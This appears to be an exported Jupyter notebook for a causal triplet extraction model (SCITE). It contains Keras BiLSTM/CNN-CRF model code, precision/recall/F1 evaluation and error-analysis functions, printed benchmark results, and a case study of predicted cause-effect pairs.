return_sequences=False)), name="CHAR_BiLSTM")(char_emb)
if args.char_emb == 'cnn':
char_emb = TimeDistributed(MaskConv1D(filters=NUM_CHAR_CNN_FILTER,
kernel_size=CHAR_CNN_KERNEL_SIZE,
padding='same',
kernel_initializer=self.kernel_initializer), name="CHAR_CNN")(char_emb)
char_emb = TimeDistributed(
Lambda(lambda x: K.max(x, axis=1)), name="MAX_POOLING")(char_emb)
input_node.append(char_seq)
emb = concatenate([emb, char_emb], axis=-1, name='EMB_CHAR')
if args.backbone == 'lstm':
dec = Bidirectional(LSTM(args.lstm_size,
kernel_initializer=self.kernel_initializer,
recurrent_initializer=self.recurrent_initializer,
dropout=args.dropout_rate,
recurrent_dropout=args.dropout_rate,
implementation=2,
return_sequences=True),
merge_mode='concat', name='BiLSTM-1')(emb)
'''
enc_bilstm = Bidirectional(LSTM(args.lstm_size,
kernel_initializer=self.kernel_initializer,
recurrent_initializer=self.recurrent_initializer,
dropout=args.dropout_rate,
recurrent_dropout=args.dropout_rate,
implementation=2,
return_sequences=True),
merge_mode='concat', name='BiLSTM-1')(emb)
dec = Bidirectional(LSTM(args.lstm_size,
kernel_initializer=self.kernel_initializer,
recurrent_initializer=self.recurrent_initializer,
dropout=args.dropout_rate,
recurrent_dropout=args.dropout_rate,
implementation=2,
return_sequences=True),
merge_mode='concat', name='BiLSTM-2')(enc_bilstm)
'''
if args.use_att:
mhsa = MultiHeadSelfAttention(
head_num=args.nb_head, size_per_head=args.size_per_head, kernel_initializer=self.kernel_initializer, name='MHSA')(dec)
dec = concatenate(
[dec, mhsa], axis=-1, name='CONTEXT')
if args.backbone == 'cnn':
conv_1 = self.conv_block(
emb, dilation_rate=DILATION_RATE[0], name='1')
conv_2 = self.conv_block(
conv_1, dilation_rate=DILATION_RATE[1], name='2')
conv_3 = self.conv_block(
conv_2, dilation_rate=DILATION_RATE[2], name='3')
dec = self.conv_block(conv_3, dilation_rate=DILATION_RATE[-1],
use_dropout=False, name='4')
if args.classifier == 'softmax':
output = TimeDistributed(Dense(NUM_CLASS, activation='softmax',
kernel_initializer=self.kernel_initializer), name='DENSE')(dec)
loss_func = 'sparse_categorical_crossentropy'
if args.classifier == 'crf':
dense = TimeDistributed(Dense(
NUM_CLASS, activation=None, kernel_initializer=self.kernel_initializer), name='DENSE')(dec)
crf = ChainCRF(init=self.kernel_initializer, name='CRF')
output = crf(dense)
loss_func = crf.sparse_loss
optimizer = optimizers.Nadam(lr=self.lr, clipnorm=args.clip_norm)
model = Model(inputs=input_node, outputs=output)
model.compile(loss=loss_func, optimizer=optimizer)
return model
parser = argparse.ArgumentParser()
parser.add_argument('-fp', '--file_path', type=str, default="your path to /data/", help="")
parser.add_argument('-s', '--seed', type=int, default=666, help="")
parser.add_argument('-kf', '--k_fold', type=int, default=0)
parser.add_argument('-cuda', '--cuda_devices', type=int, default=1)
parser.add_argument('-cpu', '--cpu_core', type=int, default=1)
parser.add_argument('-cse', '--use_flair', type=bool, default=True, help="")
parser.add_argument('-chr', '--char_emb', type=str, default="cnn", help="lstm or cnn or None")
parser.add_argument('-b', '--backbone', type=str, default="lstm", help="lstm or cnn")
parser.add_argument('-ls', '--lstm_size', type=int, default=256, help="")
parser.add_argument('-dp', '--dropout_rate', type=float, default=0.5, help="")
parser.add_argument('-att', '--use_att', type=bool, default=True, help="")
parser.add_argument('-nh', '--nb_head', type=int, default=3, help="")
parser.add_argument('-hs', '--size_per_head', type=int, default=8, help="")
parser.add_argument('-lr', '--learning_rate', type=float, default=0.002, help="")
parser.add_argument('-cl', '--classifier', type=str, default="crf", help="softmax or crf")
parser.add_argument('-cn', '--clip_norm', type=float, default=5.0, help="")
parser.add_argument('-n', '--num_epochs', type=int, default=200, help="")
parser.add_argument('-bs', '--batch_size', type=int, default=16, help="")
args = parser.parse_args()
args.file_path = 'your path to /data/'
data = Data(args)
extractor = CausalityExtractor(args)
model = extractor.slm(data)
model.summary()
def compute_f1(tp, ap, pp):
pre = tp / float(pp) if pp != 0 else 0
rec = tp / float(ap) if ap != 0 else 0
f1 = 2 * pre * rec / float(pre + rec) if (pre + rec) != 0 else 0
return pre, rec, f1
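# Minimal sanity check of compute_f1 on made-up counts (illustration only): 8 exactly
# matched triplets out of 12 predicted and 10 gold gives P = 2/3, R = 4/5, F1 = 8/11.
_p, _r, _f = compute_f1(8, 10, 12)
assert abs(_f - 8.0 / 11.0) < 1e-6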
def load_pred(path):
model.load_weights(path)
test_generator = DataGenerator([i for i in range(len(data.xTest))],
x=data.xTest,
x_flair=data.test_flair,
x_char=data.test_char,
y=data.yTest,
batch_size=args.batch_size,
classifier=args.classifier,
pred=True)
return np.argmax(model.predict_generator(test_generator), axis=-1)[:len(data.xTest)]
def evaluation_ctl(path=None, show=False):
"""
Compute precision, recall and f1-score for causal triplet labeling
"""
if path:
y_pred = load_pred(path=path)
else:
y_pred = data.yTest.reshape(data.yTest.shape[0], MAX_WLEN)
y_true = data.yTest.reshape(data.yTest.shape[0], MAX_WLEN)
pp1, pp2, pp3, pp4, pp5, pp6 = 0, 0, 0, 0, 0, 0
tp1, tp2, tp3, tp4, tp5, tp6 = 0, 0, 0, 0, 0, 0
ap1, ap2, ap3, ap4, ap5, ap6 = 236, 229, 238, 230, 9, 16
for i, yp in enumerate(y_pred):
yt = y_true[i]
for j in range(len(y_true[i])):
if yp[j] == 1:
pp1 += 1
if yt[j] == 1:
tp1 += 1
if yp[j] == 2:
pp2 += 1
if yt[j] == 2:
tp2 += 1
if yp[j] == 3:
pp3 += 1
if yt[j] == 3:
tp3 += 1
if yp[j] == 4:
pp4 += 1
if yt[j] == 4:
tp4 += 1
if yp[j] == 5:
pp5 += 1
if yt[j] == 5:
tp5 += 1
if yp[j] == 6:
pp6 += 1
if yt[j] == 6:
tp6 += 1
#return y_pred
#pp, tp, sc, se = 0, 0, 0, 0
pp, tp = 0, 0
#return [final_result(yp, [data.index2word[w] for w in data.xTest[i] if w != 0]) for i, yp in enumerate(y_pred)]
for i, yp in enumerate(y_pred):
yp_idx = final_result(
yp, [data.index2word[w] for w in data.xTest[i] if w != 0])
if yp_idx != 0:
pp += len(yp_idx)
if data.y_true_idx[i] != 0:
y_true_Cause = [[data.index2word[data.xTest[i][idx]]
for idx in m[0]] for m in data.y_true_idx[i]]
y_true_Effect = [[data.index2word[data.xTest[i][idx]]
for idx in m[-1]] for m in data.y_true_idx[i]]
y_true_Triplet = [(y_true_Cause[i], y_true_Effect[i])
for i in range(len(y_true_Cause))]
log_c, log_e = [], []
for m in data.y_true_idx[i]:
y_true_cause = [
data.index2word[data.xTest[i][idx]] for idx in m[0]]
y_true_effect = [
data.index2word[data.xTest[i][idx]] for idx in m[-1]]
for n in yp_idx:
y_pred_cause = [data.index2word[data.xTest[i][idx]]
for idx in n[0] if data.xTest[i][idx] != 0]
y_pred_effect = [data.index2word[data.xTest[i][idx]]
for idx in n[-1] if data.xTest[i][idx] != 0]
if y_true_cause == y_pred_cause and y_true_effect == y_pred_effect:
tp += 1
#if y_true_cause == y_pred_cause and y_true_effect != y_pred_effect and (y_pred_cause, y_pred_effect) not in y_true_Triplet:#+log_c:
#if y_true_effect != y_pred_effect and (y_pred_cause, y_pred_effect) not in y_true_Triplet+log_c:
# if (n[0], n[-1]) not in log_c:
# sc += 1
# log_c.append((n[0], n[-1]))
#log_c.append((y_pred_cause, y_pred_effect))
#if y_true_cause != y_pred_cause and y_true_effect == y_pred_effect and (y_pred_cause, y_pred_effect) not in y_true_Triplet:#+log_e:
#if y_true_cause != y_pred_cause and (y_pred_cause, y_pred_effect) not in y_true_Triplet+log_e:
# if (n[0], n[-1]) not in log_e:
# se += 1
# log_e.append((n[0], n[-1]))
#log_e.append((y_pred_cause, y_pred_effect))
pre, rec, f1 = compute_f1(tp, data.ap, pp)
#pre1, rec1, f11 = compute_f1(tp1, ap1, pp1)
#pre2, rec2, f12 = compute_f1(tp2, ap2, pp2)
#pre3, rec3, f13 = compute_f1(tp3, ap3, pp3)
#pre4, rec4, f14 = compute_f1(tp4, ap4, pp4)
#pre5, rec5, f15 = compute_f1(tp5, ap5, pp5)
#pre6, rec6, f16 = compute_f1(tp6, ap6, pp6)
preC, recC, f1C = compute_f1(tp1+tp2, ap1+ap2, pp1+pp2)
preE, recE, f1E = compute_f1(tp3+tp4, ap3+ap4, pp3+pp4)
preEmb, recEmb, f1Emb = compute_f1(tp5+tp6, ap5+ap6, pp5+pp6)
#print(tp1, tp2, ap1, ap2, pp1, pp2)
#scr = sc / float(data.ap)
#scr = sc / float(pp)
#ser = se / float(data.ap)
#ser = se / float(pp)
#print('Triplet: pre: %.4f' % pre, ' rec: %.4f' % rec, ' f1: %.4f' % f1)
#print('B-C: pre: %.4f' % pre1, ' rec: %.4f' % rec1, ' f1: %.4f' % f11)
#print('I-C: pre: %.4f' % pre2, ' rec: %.4f' % rec2, ' f1: %.4f' % f12)
#print('B-E: pre: %.4f' % pre3, ' rec: %.4f' % rec3, ' f1: %.4f' % f13)
#print('I-E: pre: %.4f' % pre4, ' rec: %.4f' % rec4, ' f1: %.4f' % f14)
#print('B-Emb: pre: %.4f' % pre5, ' rec: %.4f' % rec5, ' f1: %.4f' % f15)
#print('I-Emb: pre: %.4f' % pre6, ' rec: %.4f' % rec6, ' f1: %.4f' % f16)
#print('single-cause: %.4f' % scr, ' single-effect: %.4f' % ser)
#return pre, rec, f1, pre1, rec1, f11, pre2, rec2, f12, pre3, rec3, f13, pre4, rec4, f14, pre5, rec5, f15, pre6, rec6, f16, scr, ser
if show:
print('Triplet: pre: %.4f' % pre, ' rec: %.4f' % rec, ' f1: %.4f' % f1)
print('C: pre: %.4f' % preC, ' rec: %.4f' % recC, ' f1: %.4f' % f1C)
print('E: pre: %.4f' % preE, ' rec: %.4f' % recE, ' f1: %.4f' % f1E)
print('Emb: pre: %.4f' % preEmb, ' rec: %.4f' % recEmb, ' f1: %.4f' % f1Emb)
#print('single-cause: %.4f' % scr, ' single-effect: %.4f' % ser)
return pre, rec, f1, preC, recC, f1C, preE, recE, f1E, preEmb, recEmb, f1Emb
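# Scoring note: a predicted triplet counts as a true positive only when both its cause
# tokens and its effect tokens exactly match a gold triplet of the same sentence; partial
# span overlaps are treated as errors.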
def evaluation_ctl_distance(path=None, show=False, mode="1"):
    """
    Compute precision, recall and f1-score for causal triplet labeling,
    restricted to triplets whose token-index span (max index minus min index
    over cause and effect) falls in the bucket selected by `mode`
    (1: 0-5, 2: 6-10, 3: 11+, 4: all)
    """
if path:
y_pred = load_pred(path=path)
else:
y_pred = data.yTest.reshape(data.yTest.shape[0], MAX_WLEN)
y_true = data.yTest.reshape(data.yTest.shape[0], MAX_WLEN)
ap, pp, tp = 0, 0, 0
if mode == "1":
minD = 0
maxD = 5
if mode == "2":
minD = 6
maxD = 10
if mode == "3":
minD = 11
maxD = MAX_WLEN
if mode == "4":
minD = 0
maxD = MAX_WLEN
'''
if mode == "1":
minD = 0
maxD = 4
if mode == "2":
minD = 5
maxD = 6
if mode == "3":
minD = 7
maxD = 9
if mode == "4":
minD = 10
maxD = MAX_WLEN
if mode == "5":
minD = 0
maxD = MAX_WLEN
'''
for i, yp in enumerate(y_pred):
if data.y_true_idx[i] != 0:
ap += len([k for k in [max(sum(j, []))-min(sum(j, [])) for j in data.y_true_idx[i]] if k <= maxD and k >= minD])
yp_idx = final_result(
yp, [data.index2word[w] for w in data.xTest[i] if w != 0])
if yp_idx != 0:
pp += len([k for k in [max(sum(j, []))-min(sum(j, [])) for j in yp_idx] if k <= maxD and k >= minD])
if data.y_true_idx[i] != 0:
for m in data.y_true_idx[i]:
if max(sum(m, []))-min(sum(m, [])) <= maxD and max(sum(m, []))-min(sum(m, [])) >= minD:
y_true_cause = [
data.index2word[data.xTest[i][idx]] for idx in m[0]]
y_true_effect = [
data.index2word[data.xTest[i][idx]] for idx in m[-1]]
for n in yp_idx:
if max(sum(n, []))-min(sum(n, [])) <= maxD and max(sum(n, []))-min(sum(n, [])) >= minD:
y_pred_cause = [data.index2word[data.xTest[i][idx]]
for idx in n[0] if data.xTest[i][idx] != 0]
y_pred_effect = [data.index2word[data.xTest[i][idx]]
for idx in n[-1] if data.xTest[i][idx] != 0]
if y_true_cause == y_pred_cause and y_true_effect == y_pred_effect:
tp += 1
pre, rec, f1 = compute_f1(tp, ap, pp)
if show:
print('Triplet: pre: %.4f' % pre, ' rec: %.4f' % rec, ' f1: %.4f' % f1)
return tp, ap, pp
return pre, rec, f1
def evaluation_ctl_ea(path=None):
if path:
y_pred = load_pred(path=path)
else:
y_pred = data.yTest.reshape(data.yTest.shape[0], MAX_WLEN)
y_true = data.yTest.reshape(data.yTest.shape[0], MAX_WLEN)
c2e, c2emb, c2o = 0, 0, 0
e2c, e2emb, e2o = 0, 0, 0
emb2c, emb2e, emb2o = 0, 0, 0
o2c, o2e, o2emb = 0, 0, 0
for i, yp in enumerate(y_pred):
yt = y_true[i]
for j in range(len(y_true[i])):
if yt[j] in [1, 2]:
if yp[j] in [3, 4]:
c2e += 1
if yp[j] in [5, 6]:
c2emb += 1
if yp[j] == 0:
c2o += 1
if yt[j] in [3, 4]:
if yp[j] in [1, 2]:
e2c += 1
if yp[j] in [5, 6]:
e2emb += 1
if yp[j] == 0:
e2o += 1
if yt[j] in [5, 6]:
if yp[j] in [1, 2]:
emb2c += 1
if yp[j] in [3, 4]:
emb2e += 1
if yp[j] == 0:
emb2o += 1
if yt[j] == 0:
if yp[j] in [1, 2]:
o2c += 1
if yp[j] in [3, 4]:
o2e += 1
if yp[j] in [5, 6]:
o2emb += 1
return c2e, c2emb, c2o, e2c, e2emb, e2o, emb2c, emb2e, emb2o, o2c, o2e, o2emb
def sprint_distance(fileName, mode="1"):
pre, rec, f1 = [], [], []
fileName = [fileName+i for i in sum([i[-1] for i in os.walk(fileName)], [])]
for fn in fileName:
        _ = evaluation_ctl_distance(fn, mode=mode)
pre.append(_[0]), rec.append(_[1]), f1.append(_[2]);
print('Triplet: pre: %.4f±%.4f' % (np.mean(pre), np.std(pre)), ' rec: %.4f±%.4f' % (np.mean(rec), np.std(rec)), ' f1: %.4f±%.4f' % (np.mean(f1), np.std(f1)))
def sprint_ea(fileName):
c2e, c2emb, c2o, e2c, e2emb, e2o, emb2c, emb2e, emb2o, o2c, o2e, o2emb = [], [], [], [], [], [], [], [], [], [], [], []
fileName = [fileName+i for i in sum([i[-1] for i in os.walk(fileName)], [])]
for fn in fileName:
_ = evaluation_ctl_ea(fn)
c2e.append(_[0]), c2emb.append(_[1]), c2o.append(_[2]);
e2c.append(_[3]), e2emb.append(_[4]), e2o.append(_[5]);
emb2c.append(_[6]), emb2e.append(_[7]), emb2o.append(_[8]);
o2c.append(_[9]), o2e.append(_[10]), o2emb.append(_[11]);
#print(' C E Emb O')
#print('C - %.2f %.2f %.2f' % (np.mean(e2c[-1]), np.mean(emb2c[-1]), np.mean(o2c[-1])))
#print('E %.2f - %.2f %.2f' % (np.mean(c2e[-1]), np.mean(emb2e[-1]), np.mean(o2e[-1])))
#print('Emb %.2f %.2f - %.2f' % (np.mean(c2emb[-1]), np.mean(e2emb[-1]), np.mean(o2emb[-1])))
#print('O %.2f %.2f %.2f -' % (np.mean(c2o[-1]), np.mean(e2o[-1]), np.mean(emb2o[-1])))
print(' C E Emb O')
print('C - %.2f %.2f %.2f' % (np.mean(e2c), np.mean(emb2c), np.mean(o2c)))
print('E %.2f - %.2f %.2f' % (np.mean(c2e), np.mean(emb2e), np.mean(o2e)))
print('Emb %.2f %.2f - %.2f' % (np.mean(c2emb), np.mean(e2emb), np.mean(o2emb)))
print('O %.2f %.2f %.2f -' % (np.mean(c2o), np.mean(e2o), np.mean(emb2o)))
return c2e, c2emb, c2o, e2c, e2emb, e2o, emb2c, emb2e, emb2o, o2c, o2e, o2emb
def mhsa_analysis(fileName):
#for m in [1, 2, 3, 4, 5]:
for m in [1, 2, 3, 4]:
sprint_distance(fileName, mode=str(m))
def sprint(fileName, tag=False):
pre, rec, f1 = [], [], []
preC, recC, f1C = [], [], []
preE, recE, f1E = [], [], []
preEmb, recEmb, f1Emb = [], [], []
#scr, ser = [], []
fileName = [fileName+i for i in sum([i[-1] for i in os.walk(fileName)], [])]
for fn in fileName:
_ = evaluation_ctl(fn)
pre.append(_[0]), rec.append(_[1]), f1.append(_[2]);
preC.append(_[3]), recC.append(_[4]), f1C.append(_[5]);
preE.append(_[6]), recE.append(_[7]), f1E.append(_[8]);
preEmb.append(_[9]), recEmb.append(_[10]), f1Emb.append(_[11]);
#scr.append(_[-2]), ser.append(_[-1]);
print('Triplet: pre: %.4f±%.4f' % (np.mean(pre), np.std(pre)), ' rec: %.4f±%.4f' % (np.mean(rec), np.std(rec)), ' f1: %.4f±%.4f' % (np.mean(f1), np.std(f1)))
if tag:
print('C: pre: %.4f±%.4f' % (np.mean(preC), np.std(preC)), ' rec: %.4f±%.4f' % (np.mean(recC), np.std(recC)), ' f1: %.4f±%.4f' % (np.mean(f1C), np.std(f1C)))
print('E: pre: %.4f±%.4f' % (np.mean(preE), np.std(preE)), ' rec: %.4f±%.4f' % (np.mean(recE), np.std(recE)), ' f1: %.4f±%.4f' % (np.mean(f1E), np.std(f1E)))
print('Emb: pre: %.4f±%.4f' % (np.mean(preEmb), np.std(preEmb)), ' rec: %.4f±%.4f' % (np.mean(recEmb), np.std(recEmb)), ' f1: %.4f±%.4f' % (np.mean(f1Emb), np.std(f1Emb)))
#print('single-cause: %.4f±%.4f' % (np.mean(scr), np.std(scr)), ' single-effect: %.4f±%.4f' % (np.mean(ser), np.std(ser)))
def predict(path=None):
"""
Print predict causal triplets
"""
if path:
y_pred = load_pred(path=path)
else:
y_pred = data.yTest.reshape(data.yTest.shape[0], MAX_WLEN)
y_true = data.yTest.reshape(data.yTest.shape[0], MAX_WLEN)
flag = 1
for i, yp in enumerate(y_pred):
yp_idx = final_result(
yp, [data.index2word[w] for w in data.xTest[i] if w != 0])
if data.y_true_idx[i] != 0 and 5 not in y_true[i]:
print('------------------')
print('Sentence-%.3d' % flag,
' '.join([data.index2word[w] for w in data.xTest[i] if w != 0]))
y_true_Cause = [[data.index2word[data.xTest[i][idx]]
for idx in m[0]] for m in data.y_true_idx[i]]
y_true_Effect = [[data.index2word[data.xTest[i][idx]]
for idx in m[-1]] for m in data.y_true_idx[i]]
print([(y_true_Cause[i], y_true_Effect[i])
for i in range(len(y_true_Cause))])
if yp_idx != 0:
y_pred_Cause = [[data.index2word[data.xTest[i][idx]]
for idx in n[0] if data.xTest[i][idx] != 0] for n in yp_idx]
y_pred_Effect = [[data.index2word[data.xTest[i][idx]]
for idx in n[-1] if data.xTest[i][idx] != 0] for n in yp_idx]
print([(y_pred_Cause[i], y_pred_Effect[i])
for i in range(len(y_pred_Cause))])
else:
print([])
flag += 1
###Output
_____no_output_____
###Markdown
Main Results IDCNN-Softmax
###Code
sprint('your path to /FLAIR-False_CHAR-None_CNN_MHSA-False_SOFTMAX/test/')
###Output
Triplet: pre: 0.7455±0.0142 rec: 0.7074±0.0168 f1: 0.7258±0.0105
###Markdown
IDCNN-CRF
###Code
sprint('your path to /FLAIR-False_CHAR-None_CNN_MHSA-False_CRF/test/')
###Output
Triplet: pre: 0.7442±0.0225 rec: 0.7142±0.0122 f1: 0.7288±0.0160
###Markdown
BiLSTM-Softmax
###Code
sprint('your path to /FLAIR-False_CHAR-None_LSTM_MHSA-False_SOFTMAX/test/')
###Output
Triplet: pre: 0.7744±0.0183 rec: 0.7622±0.0114 f1: 0.7682±0.0138
###Markdown
CLSTM-BiLSTM-CRF
###Code
sprint('your path to /FLAIR-False_CHAR-lstm_LSTM_MHSA-False_CRF/test/')
###Output
Triplet: pre: 0.8144±0.0284 rec: 0.7412±0.0073 f1: 0.7757±0.0107
###Markdown
CCNN-BiLSTM-CRF
###Code
sprint('your path to /FLAIR-False_CHAR-cnn_LSTM_MHSA-False_CRF/test/')
###Output
Triplet: pre: 0.8069±0.0199 rec: 0.7520±0.0227 f1: 0.7780±0.0075
###Markdown
BiLSTM-CRF
###Code
sprint('your path to /FLAIR-False_CHAR-None_LSTM_MHSA-False_CRF/test/', tag=True)
###Output
Triplet: pre: 0.7837±0.0061 rec: 0.7932±0.0087 f1: 0.7884±0.0072
C: pre: 0.8810±0.0070 rec: 0.8628±0.0094 f1: 0.8718±0.0076
E: pre: 0.8928±0.0037 rec: 0.8897±0.0040 f1: 0.8913±0.0031
Emb: pre: 0.4343±0.1899 rec: 0.0960±0.0320 f1: 0.1567±0.0551
###Markdown
BERT-BiLSTM-CRF
###Code
sprint('your path to /logs/BERT-True-s_CHAR-None_LSTM_MHSA-False_CRF/test/')
###Output
Triplet: pre: 0.8277±0.0058 rec: 0.8209±0.0093 f1: 0.8243±0.0049
###Markdown
Flair+CLSTM-BiLSTM-CRF
###Code
sprint('your path to /logs/FLAIR-True_CHAR-lstm_LSTM_MHSA-False_CRF/test/')
###Output
Triplet: pre: 0.8403±0.0090 rec: 0.8284±0.0125 f1: 0.8343±0.0106
###Markdown
ELMo-BiLSTM-CRF
###Code
sprint('your path to /logs/ELMO-True_CHAR-None_LSTM_MHSA-False_CRF/test/')
###Output
Triplet: pre: 0.8361±0.0135 rec: 0.8399±0.0063 f1: 0.8379±0.0092
###Markdown
Flair-BiLSTM-CRF
###Code
sprint('your path to /logs/FLAIR-True_CHAR-None_LSTM_MHSA-False_CRF/test/', tag=True)
###Output
Triplet: pre: 0.8414±0.0079 rec: 0.8351±0.0141 f1: 0.8382±0.0092
C: pre: 0.8995±0.0091 rec: 0.8843±0.0142 f1: 0.8917±0.0073
E: pre: 0.9294±0.0062 rec: 0.8885±0.0075 f1: 0.9084±0.0030
Emb: pre: 0.8556±0.1975 rec: 0.1360±0.0784 f1: 0.2197±0.1027
###Markdown
SCITE
###Code
sprint('your path to /logs/FLAIR-True_CHAR-cnn_LSTM_MHSA-True_CRF/test/', tag=True)
###Output
Triplet: pre: 0.8333±0.0042 rec: 0.8581±0.0021 f1: 0.8455±0.0028
C: pre: 0.8999±0.0079 rec: 0.8998±0.0044 f1: 0.8998±0.0018
E: pre: 0.9272±0.0073 rec: 0.9021±0.0090 f1: 0.9144±0.0055
Emb: pre: 0.8489±0.2165 rec: 0.1920±0.1085 f1: 0.2947±0.1477
###Markdown
Error Analysis BiLSTM-CRF
###Code
sprint_ea('your path to /logs/FLAIR-False_CHAR-None_LSTM_MHSA-False_CRF/test/')
###Output
C E Emb O
C - 0.00 10.00 37.60
E 3.40 - 12.20 30.60
Emb 1.40 1.60 - 0.40
O 52.40 46.20 0.40 -
###Markdown
Flair-BiLSTM-CRF
###Code
sprint_ea('your path to /FLAIR-True_CHAR-None_LSTM_MHSA-False_CRF/test/')
###Output
C E Emb O
C - 0.00 10.00 30.60
E 0.00 - 11.60 16.40
Emb 0.40 0.80 - 0.00
O 48.00 47.80 0.00 -
###Markdown
SCITE
###Code
sprint_ea('your path to /FLAIR-True_CHAR-cnn_LSTM_MHSA-True_CRF/test/')
###Output
C E Emb O
C - 0.00 7.80 34.40
E 1.00 - 12.40 16.20
Emb 0.00 1.40 - 0.00
O 41.20 40.80 0.00 -
###Markdown
Ablation Analysis Flair-BiLSTM-MHSA-CRF
###Code
sprint('your path to /FLAIR-True_CHAR-None_LSTM_MHSA-True-24_CRF/test/')
###Output
Triplet: pre: 0.8269±0.0114 rec: 0.8615±0.0077 f1: 0.8438±0.0090
###Markdown
BiLSTM-MHSA-CRF
###Code
sprint('your path to /FLAIR-False_CHAR-None_LSTM_MHSA-True_CRF/test/')
###Output
Triplet: pre: 0.8014±0.0043 rec: 0.8264±0.0070 f1: 0.8137±0.0051
###Markdown
Analysis of MHSA First Group BiLSTM-CRF
###Code
mhsa_analysis('your path to /FLAIR-False_CHAR-None_LSTM_MHSA-False_CRF/test/')
###Output
Triplet: pre: 0.8748±0.0059 rec: 0.9160±0.0053 f1: 0.8949±0.0048
Triplet: pre: 0.7415±0.0111 rec: 0.7484±0.0091 f1: 0.7450±0.0096
Triplet: pre: 0.6548±0.0090 rec: 0.6122±0.0365 f1: 0.6324±0.0227
Triplet: pre: 0.7837±0.0061 rec: 0.7932±0.0087 f1: 0.7884±0.0072
###Markdown
BiLSTM-MHSA-CRF
###Code
mhsa_analysis('your path to /FLAIR-False_CHAR-None_LSTM_MHSA-True_CRF/test/')
###Output
Triplet: pre: 0.8990±0.0083 rec: 0.9277±0.0114 f1: 0.9131±0.0092
Triplet: pre: 0.7587±0.0087 rec: 0.7906±0.0134 f1: 0.7743±0.0073
Triplet: pre: 0.6747±0.0503 rec: 0.6735±0.0428 f1: 0.6737±0.0436
Triplet: pre: 0.8014±0.0043 rec: 0.8264±0.0070 f1: 0.8137±0.0051
###Markdown
Second Group Flair-BiLSTM-CRF
###Code
mhsa_analysis('your path to /FLAIR-True_CHAR-None_LSTM_MHSA-False_CRF/test/')
###Output
Triplet: pre: 0.8970±0.0073 rec: 0.9210±0.0041 f1: 0.9088±0.0034
Triplet: pre: 0.8272±0.0116 rec: 0.8156±0.0255 f1: 0.8212±0.0171
Triplet: pre: 0.7236±0.0257 rec: 0.6694±0.0153 f1: 0.6950±0.0114
Triplet: pre: 0.8414±0.0079 rec: 0.8351±0.0141 f1: 0.8382±0.0092
###Markdown
Flair-BiLSTM-MHSA-CRF
###Code
mhsa_analysis('your path to /FLAIR-True_CHAR-None_LSTM_MHSA-True-24_CRF/test/')
###Output
Triplet: pre: 0.8981±0.0156 rec: 0.9328±0.0159 f1: 0.9151±0.0153
Triplet: pre: 0.8055±0.0193 rec: 0.8453±0.0058 f1: 0.8248±0.0103
Triplet: pre: 0.7105±0.0160 rec: 0.7306±0.0200 f1: 0.7203±0.0152
Triplet: pre: 0.8269±0.0114 rec: 0.8615±0.0077 f1: 0.8438±0.0090
###Markdown
Third Group Flair+CCNN-BiLSTM-CRF
###Code
mhsa_analysis('your path to /FLAIR-True_CHAR-cnn_LSTM_MHSA-False_CRF/test/')
###Output
Triplet: pre: 0.9067±0.0056 rec: 0.9143±0.0034 f1: 0.9105±0.0032
Triplet: pre: 0.8156±0.0161 rec: 0.8016±0.0245 f1: 0.8084±0.0187
Triplet: pre: 0.7549±0.0474 rec: 0.6776±0.0327 f1: 0.7126±0.0201
Triplet: pre: 0.8435±0.0034 rec: 0.8264±0.0143 f1: 0.8348±0.0065
###Markdown
SCITE
###Code
mhsa_analysis('your path to /FLAIR-True_CHAR-cnn_LSTM_MHSA-True_CRF/test/')
###Output
Triplet: pre: 0.9039±0.0075 rec: 0.9328±0.0141 f1: 0.9181±0.0088
Triplet: pre: 0.8134±0.0118 rec: 0.8375±0.0091 f1: 0.8253±0.0096
Triplet: pre: 0.7060±0.0398 rec: 0.7224±0.0356 f1: 0.7139±0.0353
Triplet: pre: 0.8333±0.0042 rec: 0.8581±0.0021 f1: 0.8455±0.0028
###Markdown
Case Study 1-175
###Code
predict('your path to /FLAIR-True_CHAR-cnn_LSTM_MHSA-True_CRF/test/6_{96}.hdf5')
predict('your path to /FLAIR-True_CHAR-None_LSTM_MHSA-False_CRF/test/6_{115}.hdf5')
predict('your path to /FLAIR-False_CHAR-None_LSTM_MHSA-False_CRF/test/6_{198}.hdf5')
###Output
------------------
Sentence-001 Cold sores or fever blisters are caused by the herpes simplex virus and are usually relatively easy to identify
[(['the', 'herpes', 'simplex', 'virus'], ['Cold', 'sores']), (['the', 'herpes', 'simplex', 'virus'], ['fever', 'blisters'])]
[(['the', 'herpes', 'simplex', 'virus'], ['Cold', 'sores']), (['the', 'herpes', 'simplex', 'virus'], ['fever', 'blisters'])]
------------------
Sentence-002 Fog , rain , darkness , and or blowing snow lead to disorientation
[(['Fog'], ['disorientation']), (['rain'], ['disorientation']), (['darkness'], ['disorientation']), (['blowing', 'snow'], ['disorientation'])]
[(['Fog'], ['disorientation']), (['rain'], ['disorientation']), (['darkness'], ['disorientation']), (['blowing', 'snow'], ['disorientation'])]
------------------
Sentence-003 Aware of the suffering caused by unmindful drinking , I am committed to cultivate good health , both physical and mental , for myself , my family , and my society
[(['unmindful', 'drinking'], ['the', 'suffering'])]
[(['unmindful', 'drinking'], ['the', 'suffering'])]
------------------
Sentence-004 Information about the foodborne illness caused by salmonella bacteria
[(['salmonella', 'bacteria'], ['the', 'foodborne', 'illness'])]
[(['salmonella', 'bacteria'], ['the', 'foodborne', 'illness'])]
------------------
Sentence-005 This is one of the more common causes of hair loss caused by stress and when you are losing hair because of this your hair stops growing and lies dormant
[(['stress'], ['hair', 'loss'])]
[(['stress'], ['hair', 'loss'])]
------------------
Sentence-006 The storm resulted in 31 deaths and 2 5 million dollars damage
[(['The', 'storm'], ['31', 'deaths']), (['The', 'storm'], ['2', '5', 'million', 'dollars', 'damage'])]
[(['The', 'storm'], ['31', 'deaths']), (['The', 'storm'], ['dollars', 'damage'])]
------------------
Sentence-007 Bed sores are caused by pressure , which cuts off blood flow to parts of the body
[(['pressure'], ['Bed', 'sores'])]
[(['pressure'], ['Bed', 'sores'])]
------------------
Sentence-008 My problem is that the advertisement gives the impression that women in rural Bangladesh have 6 children
[(['the', 'advertisement'], ['the', 'impression'])]
[(['the', 'advertisement'], ['the', 'impression'])]
------------------
Sentence-009 Individual donors make a significant difference in addressing the suffering caused by the economic crisis
[(['the', 'economic', 'crisis'], ['the', 'suffering'])]
[(['the', 'economic', 'crisis'], ['a', 'significant', 'difference']), (['the', 'economic', 'crisis'], ['the', 'suffering'])]
------------------
Sentence-010 Overall , the fire after the earthquake burned out 7456 houses in over 530 localities
[(['the', 'earthquake'], ['the', 'fire'])]
[(['the', 'earthquake'], ['the', 'fire'])]
------------------
Sentence-011 A cancer survivor writes about the relatively rare occurrence of calcification of the breast after radiation therapy
